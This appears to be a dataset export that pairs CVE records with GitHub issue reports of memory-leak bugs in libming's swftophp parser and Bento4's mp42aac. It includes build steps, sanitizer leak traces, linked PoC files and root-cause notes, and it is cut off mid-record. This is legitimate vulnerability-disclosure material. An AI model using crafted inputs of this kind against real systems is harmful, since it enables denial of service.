cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2024-24146 | 2024-02-29T01:44:11.657 | A memory leak issue discovered in parseSWF_DEFINEBUTTON in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/307"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/307"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/libming/libming/issues/307 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | ### Envrionment
```bash
ubuntu ~/lab/libming/util master lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.2 LTS
Release: 22.04
Codename: jammy
```
### Compiler
```bash
ubuntu ~/lab/libming/util master clang -v
Ubuntu clang version 14.0.0-1ubuntu1.1
Target: x86_64-pc-linux-gnu
Thread model: posix
```
### Step to reproduce
```bash
./autogen.sh
./configure --disable-shared
cd util
make swftophp
./swftophp <PoC file>
```
### Affected Version
libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8)
### Contents of PoC file
[poc.zip](https://github.com/libming/libming/files/13924747/poc.zip)
### Expected Behavior
Print error or warning messages handled within swftophp.
### Current Behavior
* stdout
```
<?php
$m = new SWFMovie(10);
ming_setscale(1.0);
$m->setRate(7.027344);
$m->setDimension(0, 0);
$m->setFrames(1799);
/*Unknown block type 992*/
/* SWF_REMOVEOBJECT2 */
$m->remove($i2810);
/* SWF_DEFINEBUTTON */
skipping 0 bytes
/* SWF_PATHSAREPOSTSCRIPT */
/* SWF_NAMECHARACTER */
/* SWF_REMOVEOBJECT2 */
$m->remove($i1799);
/*Unknown block type 349*/
/* SWF_DOACTION */
$m->add(new SWFAction("") );
/* SWF_JPEGTABLES */
/* SWF_DOACTION */
```
* stderr
```
header indicates a filesize of 169083242 but filesize is 190
Stream out of sync after parse of blocktype 28 (SWF_REMOVEOBJECT2). 26 but expecting 31.
Stream out of sync after parse of blocktype 7 (SWF_DEFINEBUTTON). 39 but expecting 76.
Stream out of sync after parse of blocktype 40 (SWF_NAMECHARACTER). 97 but expecting 90.
Stream out of sync after parse of blocktype 28 (SWF_REMOVEOBJECT2). 94 but expecting 99.
Stack blown!! - peek
=================================================================
==18465==ERROR: LeakSanitizer: detected memory leaks
...
Direct leak of 240 byte(s) in 1 object(s) allocated from:
#0 0x55f070ff26b6 in __interceptor_realloc (/home/ubuntu/lab/libming/util/swftophp+0xbb6b6) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6)
#1 0x55f0710b2975 in parseSWF_DEFINEBUTTON /home/ubuntu/lab/libming/util/parser.c:1541:41
Direct leak of 152 byte(s) in 1 object(s) allocated from:
#0 0x55f070ff2478 in __interceptor_calloc (/home/ubuntu/lab/libming/util/swftophp+0xbb478) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6)
#1 0x55f0710b26d4 in parseSWF_DEFINEBUTTON /home/ubuntu/lab/libming/util/parser.c:1528:47
...
SUMMARY: AddressSanitizer: 42073 byte(s) leaked in 13 allocation(s).
```
You can get full log [here](https://pastebin.com/bwRHeSiW).
https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L1523-L1545
On `parseSWF_DEFINEBUTTON` function, we are allocating heap memories on `Characters` and `Actions`, but never been freed.
This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file. | Memory leaks on parseSWF_DEFINEBUTTON | https://api.github.com/repos/libming/libming/issues/307/comments | 1 | 2024-01-12T22:46:35Z | 2024-02-21T22:35:18Z | https://github.com/libming/libming/issues/307 | 2,079,829,395 | 307 | 5,996 |
CVE-2024-24147 | 2024-02-29T01:44:11.693 | A memory leak issue discovered in parseSWF_FILLSTYLEARRAY in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/311"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/311"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/libming/libming/issues/311 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | ### Envrionment
```bash
ubuntu ~/lab/libming/util master lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.2 LTS
Release: 22.04
Codename: jammy
```
### Compiler
```bash
ubuntu ~/lab/libming/util master clang -v
Ubuntu clang version 14.0.0-1ubuntu1.1
Target: x86_64-pc-linux-gnu
Thread model: posix
```
### Step to reproduce
```bash
./autogen.sh
./configure --disable-shared
cd util
make swftophp
./swftophp <PoC file>
```
### Affected Version
libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8)
### Contents of PoC file
[poc.zip](https://github.com/libming/libming/files/13925086/poc.zip)
### Expected Behavior
Print error or warning messages handled within swftophp.
### Current Behavior
* stdout
```
<?php
$m = new SWFMovie(13);
ming_setscale(1.0);
$m->setRate(6.941406);
$m->setDimension(0, 0);
$m->setFrames(1542);
/* SWF_PROTECT */
$m->protect("j\njQQQ\nj77777777777777777�j\njQQQ\nj7777!FWS\nj\r\r�\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r�\r\r\rQQQ\r\r\r\r\r\r�j\t�");
/* SWF_DEFINESHAPE3 */
/* Shape 27144 (TYPE=3, RECT=168,-350 64,333)*/
$character27144 = new SWFShape();
/*8 fillstyle(s)*/
/*3 linestyles(s)*/
$character27144_l0_width = 771;
$character27144_l0_red = 0x12;
$character27144_l0_green = 0x03;
$character27144_l0_blue = 0x03;
$character27144_l0_alpha = 0x03;
$character27144_l1_width = 771;
$character27144_l1_red = 0x03;
$character27144_l1_green = 0x37;
$character27144_l1_blue = 0x37;
$character27144_l1_alpha = 0x37;
$character27144_l2_width = 14135;
$character27144_l2_red = 0x37;
$character27144_l2_green = 0x37;
$character27144_l2_blue = 0x37;
$character27144_l2_alpha = 0x37;
/* StateLineStyle: 3 */
$character27144->setLine($character27144_l2_width, $character27144_l2_red, $character27144_l2_green, $character27144_l2_blue, $character27144_l2_alpha);
$character27144->setRightFill($character27144_f101058053);
$character27144->movePenTo(-9211021, 15132414);
/* SWF_DEFINESHAPE3 */
/* Shape 770 (TYPE=3, RECT=0,0 0,0)*/
$character770 = new SWFShape();
/*3 fillstyle(s)*/
/*3 linestyles(s)*/
$character770_l0_width = 786;
$character770_l0_red = 0x03;
$character770_l0_green = 0x03;
$character770_l0_blue = 0x03;
$character770_l0_alpha = 0x03;
$character770_l1_width = 14083;
$character770_l1_red = 0x37;
$character770_l1_green = 0x37;
$character770_l1_blue = 0x37;
$character770_l1_alpha = 0x37;
$character770_l2_width = 14135;
$character770_l2_red = 0x37;
$character770_l2_green = 0x37;
$character770_l2_blue = 0x37;
$character770_l2_alpha = 0x37;
/* StateLineStyle: 3 */
$character770->setLine($character770_l2_width, $character770_l2_red, $character770_l2_green, $character770_l2_blue, $character770_l2_alpha);
$character770->setRightFill($character770_f101058054);
$character770->movePenTo(-9211021, 16654528);
/* SWF_DOACTION */
Action: 5 50:SWFACTION_MBCHR
Offset: 32
Action: 6 51:SWFACTION_MBCHR
Offset: 33
Action: 7 52:SWFACTION_MBCHR
Offset: 34
Action: 8 53:SWFACTION_MBCHR
Offset: 35
Action: 9 54:SWFACTION_MBCHR
Offset: 36
Action: 10 55:SWFACTION_MBCHR
Offset: 37
Action: 11 56:SWFACTION_MBCHR
Offset: 38
Action: 12 57:SWFACTION_MBCHR
Offset: 39
Action: 13 58:SWFACTION_MBCHR
Offset: 3a
Action: 14 59:SWFACTION_MBCHR
Offset: 3b
Action: 15 60:SWFACTION_MBCHR
Offset: 3c
Action: 16 61:SWFACTION_MBCHR
Offset: 3d
Action: 17 62:SWFACTION_MBCHR
Offset: 3e
$m->add(new SWFAction("") );
/*Unknown block type 220*/
skipping 13 bytes
/* SWF_FONTREF */
/* SWF_DOACTION */
```
* stderr
```
header indicates a filesize of 101208077 but filesize is 197
Stream out of sync after parse of blocktype 24 (SWF_PROTECT). 187 but expecting 21.
Stream out of sync after parse of blocktype 32 (SWF_DEFINESHAPE3). 74 but expecting 33.
Stream out of sync after parse of blocktype 32 (SWF_DEFINESHAPE3). 78 but expecting 43.
Stack blown!! - pop
=================================================================
==18459==ERROR: LeakSanitizer: detected memory leaks
...
Direct leak of 36 byte(s) in 2 object(s) allocated from:
#0 0x55a363c6928e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6)
#1 0x55a363d1e348 in parseSWF_LINESTYLEARRAY /home/ubuntu/lab/libming/util/parser.c:684:25
...
```
You can get full log [here](https://pastebin.com/88FDcMfE)
### Analysis
https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L608-L625
On `parseSWF_FILLSTYLEARRAY`, we allocate `SWF_FILLSTYLE` into heap memory and set member of `fillstyle->FillStyles`, but never been freed.
This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
| Memory leaks on parseSWF_FILLSTYLEARRAY | https://api.github.com/repos/libming/libming/issues/311/comments | 1 | 2024-01-13T00:00:25Z | 2024-02-21T22:33:33Z | https://github.com/libming/libming/issues/311 | 2,079,901,582 | 311 | 5,997 |
CVE-2024-24149 | 2024-02-29T01:44:11.737 | A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/310"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/310"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/libming/libming/issues/310 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | ### Envrionment
```bash
ubuntu ~/lab/libming/util master lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.2 LTS
Release: 22.04
Codename: jammy
```
### Compiler
```bash
ubuntu ~/lab/libming/util master clang -v
Ubuntu clang version 14.0.0-1ubuntu1.1
Target: x86_64-pc-linux-gnu
Thread model: posix
```
### Step to reproduce
```bash
./autogen.sh
./configure --disable-shared
cd util
make swftophp
./swftophp <PoC file>
```
### Affected Version
libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8)
### Contents of PoC file
[poc-3.zip](https://github.com/libming/libming/files/13925051/poc-3.zip)
### Expected Behavior
Print error or warning messages handled within swftophp.
### Current Behavior
* stdout
```
<?php
$m = new SWFMovie(10);
ming_setscale(1.0);
$m->setRate(255.019531);
$m->setDimension(2, -1);
/* Note: xMin and/or yMin are not 0! */
$m->setFrames(62719);
/* SWF_PLACEOBJECT */
/*Unknown block type 648*/
skipping 59 bytes
/* SWF_DEFINESPRITE */
/* MovieClip 2570 */
$character2570 = new SWFMovieClip(); /* 2314 frames */
/* SWF_FREECHARACTER */
/* SWF_DEFINETEXT2 */
$character2056 = new SWFText(2);
$character2056->moveTo(2815, 2058);
$character2056->addString("X");
0000: 00 00 10 00 00 0a 09 f6 0a a1 09 0a 24 0a 0a 0a ........ ....$...
0010: 16 01 02 ...
header('Content-type: application/x-shockwave-flash');
$m->output(9);
?>
```
* stderr
```
header indicates a filesize of 18446744071613768297 but filesize is 144
Stream out of sync after parse of blocktype 39 (SWF_DEFINESPRITE). 105 but expecting 79.
Stream out of sync after parse of blocktype 33 (SWF_DEFINETEXT2). 113 but expecting 123.
outputSWF_TEXT_RECORD: can't process text record: fonts information list is NULL
sudden file end: read failed @125 fileSize 144, request 42
extra garbage (i.e., we messed up in main):
=================================================================
==18453==ERROR: LeakSanitizer: detected memory leaks
...
Indirect leak of 80 byte(s) in 10 object(s) allocated from:
#0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6)
#1 0x55ba89482e4d in parseSWF_GLYPHENTRY /home/ubuntu/lab/libming/util/parser.c:264:25
Indirect leak of 80 byte(s) in 10 object(s) allocated from:
#0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6)
#1 0x55ba89482b8f in parseSWF_GLYPHENTRY /home/ubuntu/lab/libming/util/parser.c:247:23
```
You can get full log [here](https://pastebin.com/He2AgT1mz).
### Analysis
https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L241-L279
On `parseSWF_GLYPHENTRY`, we dynamically allocate `gerec->GlyphIndex`, but never been freed.
This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file. | Memory leaks on parseSWF_GLYPHENTRY | https://api.github.com/repos/libming/libming/issues/310/comments | 1 | 2024-01-12T23:51:34Z | 2024-02-21T22:35:36Z | https://github.com/libming/libming/issues/310 | 2,079,896,237 | 310 | 5,998 |
CVE-2024-24150 | 2024-02-29T01:44:11.777 | A memory leak issue discovered in parseSWF_TEXTRECORD in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/309"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/libming/libming/issues/309 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | ### Envrionment
```bash
ubuntu ~/lab/libming/util master lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.2 LTS
Release: 22.04
Codename: jammy
```
### Compiler
```bash
ubuntu ~/lab/libming/util master clang -v
Ubuntu clang version 14.0.0-1ubuntu1.1
Target: x86_64-pc-linux-gnu
Thread model: posix
```
### Step to reproduce
```bash
./autogen.sh
./configure --disable-shared
cd util
make swftophp
./swftophp <PoC file>
```
### Affected Version
libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8)
### Contents of PoC file
[poc.zip](https://github.com/libming/libming/files/13925031/poc.zip)
### Expected Behavior
Print error or warning messages handled within swftophp.
### Current Behavior
* stdout
```
<?php
$m = new SWFMovie(10);
ming_setscale(1.0);
$m->setRate(255.019531);
$m->setDimension(2, -1);
/* Note: xMin and/or yMin are not 0! */
$m->setFrames(62719);
/* SWF_PLACEOBJECT */
/*Unknown block type 648*/
skipping 59 bytes
/* SWF_DEFINESPRITE */
/* MovieClip 2570 */
$character2570 = new SWFMovieClip(); /* 2314 frames */
/* SWF_FREECHARACTER */
/* SWF_DEFINETEXT2 */
$character2056 = new SWFText(2);
$character2056->moveTo(2815, 2058);
$character2056->addString("X");
0000: 00 00 10 00 00 0a 09 f6 0a a1 09 0a 24 0a 0a 0a ........ ....$...
0010: 16 01 02 ...
header('Content-type: application/x-shockwave-flash');
$m->output(9);
?>
```
* stderr
```
header indicates a filesize of 18446744071613768297 but filesize is 144
Stream out of sync after parse of blocktype 39 (SWF_DEFINESPRITE). 105 but expecting 79.
Stream out of sync after parse of blocktype 33 (SWF_DEFINETEXT2). 113 but expecting 123.
outputSWF_TEXT_RECORD: can't process text record: fonts information list is NULL
sudden file end: read failed @125 fileSize 144, request 42
extra garbage (i.e., we messed up in main):
=================================================================
==18453==ERROR: LeakSanitizer: detected memory leaks
...
Indirect leak of 160 byte(s) in 1 object(s) allocated from:
#0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6)
#1 0x55ba89483a92 in parseSWF_TEXTRECORD /home/ubuntu/lab/libming/util/parser.c:316:26
...
```
You can get full log [here](https://pastebin.com/AaN48sBN).
### Analysis
https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L281-L323
On `parseSWF_TEXTRECORD`, we allocating `brec->GlyphCount` into heap memory, but never been freed.
This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
| Memory leaks on parseSWF_TEXTRECORD | https://api.github.com/repos/libming/libming/issues/309/comments | 1 | 2024-01-12T23:44:59Z | 2024-02-21T22:47:44Z | https://github.com/libming/libming/issues/309 | 2,079,890,770 | 309 | 5,999 |
CVE-2024-24155 | 2024-02-29T01:44:11.810 | Bento4 v1.5.1-628 contains a Memory leak on AP4_Movie::AP4_Movie, parsing tracks and added into m_Tracks list, but mp42aac cannot correctly delete when we got an no audio track found error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/919"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/919"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*",
"matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/axiomatic-systems/Bento4/issues/919 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | ### Envrionment
```bash
ubuntu ~/lab/Bento4-clean/cmakebuild ◈ v1.5.1-628 lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.2 LTS
Release: 22.04
Codename: jammy
```
### Compiler
```bash
ubuntu ~/lab/Bento4-clean/cmakebuild ◈ v1.5.1-628 clang -v
Ubuntu clang version 14.0.0-1ubuntu1.1
Target: x86_64-pc-linux-gnu
Thread model: posix
InstalledDir: /usr/bin
Found candidate GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11
Selected GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11
Candidate multilib: .;@m64
Selected multilib: .;@m64
```
### Step to reproduce
```bash
git clone https://github.com/axiomatic-systems/Bento4.git -b v1.5.1-628
pushd Bento4
mkdir cmakebuild
pushd cmakebuild
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_FLAGS_RELEASE="-fsanitize=address -fno-inline" ..
make
mp4aac poc.mp4 out
```
### Affected Version
Bento4 v1.5.1-628 (https://github.com/axiomatic-systems/Bento4/tree/v1.5.1-628)
### Contents of PoC file
[poc.zip](https://github.com/axiomatic-systems/Bento4/files/13929540/poc.zip)
### Current Behavior
* stderr (Given by ASAN)
```
ERROR: no audio track found
=================================================================
==29053==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049)
#1 0x55cf6ec9a341 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:108:27
#2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5
#3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22
#4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
Indirect leak of 176 byte(s) in 2 object(s) allocated from:
#0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049)
#1 0x55cf6ecdcff5 in AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Track.cpp:242:25
Indirect leak of 48 byte(s) in 2 object(s) allocated from:
#0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049)
#1 0x55cf6eca4bec in AP4_List<AP4_Track>::Add(AP4_Track*) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4List.h:160:16
Indirect leak of 48 byte(s) in 1 object(s) allocated from:
#0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049)
#1 0x55cf6ed1eac1 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ubuntu/lab/Bento4_AFL/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:175:14
#2 0x55cf6ec89b79 in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:236:14
#3 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
Indirect leak of 40 byte(s) in 1 object(s) allocated from:
#0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049)
